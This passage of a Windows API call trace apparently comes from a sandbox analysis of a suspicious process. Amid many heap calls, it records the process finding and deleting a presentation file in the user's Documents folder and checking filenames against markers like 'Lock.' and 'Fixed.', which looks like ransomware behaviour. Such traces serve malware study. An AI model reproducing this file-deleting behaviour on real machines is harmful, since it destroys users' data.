(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0266.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0266.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0266.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0266.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0266.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0266.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0266.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0266.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0266.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0266.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0266.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0266.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0266.662] CloseHandle (hObject=0x2d0) returned 1 [0266.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0266.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0266.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0266.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0266.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0266.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0266.666] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0266.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0266.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0266.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0266.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0266.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.669] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0266.669] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0266.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0266.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0266.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0266.669] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/nuI2xgrk2vyv2-2D.pps", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\nuI2xgrk2vyv2-2D.pps", lpFilePart=0x8cedf4*="nuI2xgrk2vyv2-2D.pps") returned 0x2e [0266.669] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\nuI2xgrk2vyv2-2D.pps" (normalized: "c:\\users\\fd1hvy\\documents\\nui2xgrk2vyv2-2d.pps")) returned 0x20 [0266.670] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\nuI2xgrk2vyv2-2D.pps", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfb0cbf0, ftCreationTime.dwHighDateTime=0x1d5e737, ftLastAccessTime.dwLowDateTime=0xcac8f630, ftLastAccessTime.dwHighDateTime=0x1d5e506, ftLastWriteTime.dwLowDateTime=0xcac8f630, ftLastWriteTime.dwHighDateTime=0x1d5e506, nFileSizeHigh=0x0, nFileSizeLow=0x13e31, dwReserved0=0x1, dwReserved1=0x1c, cFileName="nuI2xgrk2vyv2-2D.pps", cAlternateFileName="NUI2XG~1.PPS")) returned 0xa87490 [0266.670] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\nuI2xgrk2vyv2-2D.pps" (normalized: "c:\\users\\fd1hvy\\documents\\nui2xgrk2vyv2-2d.pps")) returned 1 [0266.688] FindNextFileW (in: hFindFile=0xa87490, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfb0cbf0, ftCreationTime.dwHighDateTime=0x1d5e737, ftLastAccessTime.dwLowDateTime=0xcac8f630, ftLastAccessTime.dwHighDateTime=0x1d5e506, ftLastWriteTime.dwLowDateTime=0xcac8f630, ftLastWriteTime.dwHighDateTime=0x1d5e506, nFileSizeHigh=0x0, nFileSizeLow=0x13e31, dwReserved0=0x1, dwReserved1=0x1c, cFileName="nuI2xgrk2vyv2-2D.pps", cAlternateFileName="NUI2XG~1.PPS")) returned 0 [0266.689] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0266.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0266.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0266.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.689] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0266.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0266.689] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0266.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0266.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0266.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0266.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0266.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0266.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0266.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5e) returned 0x2e558d8 [0266.691] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/nuI2xgrk2vyv2-2D.pps", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\nuI2xgrk2vyv2-2D.pps", lpFilePart=0x8cf650*="nuI2xgrk2vyv2-2D.pps") returned 0x2e [0266.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0266.691] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\nuI2xgrk2vyv2-2D.pps" (normalized: "c:\\users\\fd1hvy\\documents\\nui2xgrk2vyv2-2d.pps")) returned 0xffffffff [0266.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0266.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0266.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.692] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0266.692] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.692] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0266.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0266.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0266.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0266.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0266.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pFCcGpVbcXPSBWLa.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FCcGpVbcXPSBWLa.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CcGpVbcXPSBWLa.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cGpVbcXPSBWLa.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GpVbcXPSBWLa.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pVbcXPSBWLa.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VbcXPSBWLa.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bcXPSBWLa.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cXPSBWLa.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XPSBWLa.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PSBWLa.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SBWLa.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BWLa.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WLa.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="La.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0266.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0266.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0266.697] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0266.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0266.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0266.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0266.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0266.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0266.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0266.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a) returned 0x2e55ca8 [0266.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0266.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pFCcGpVbcXPSBWLa.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FCcGpVbcXPSBWLa.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CcGpVbcXPSBWLa.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cGpVbcXPSBWLa.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GpVbcXPSBWLa.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pVbcXPSBWLa.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VbcXPSBWLa.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bcXPSBWLa.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cXPSBWLa.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XPSBWLa.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 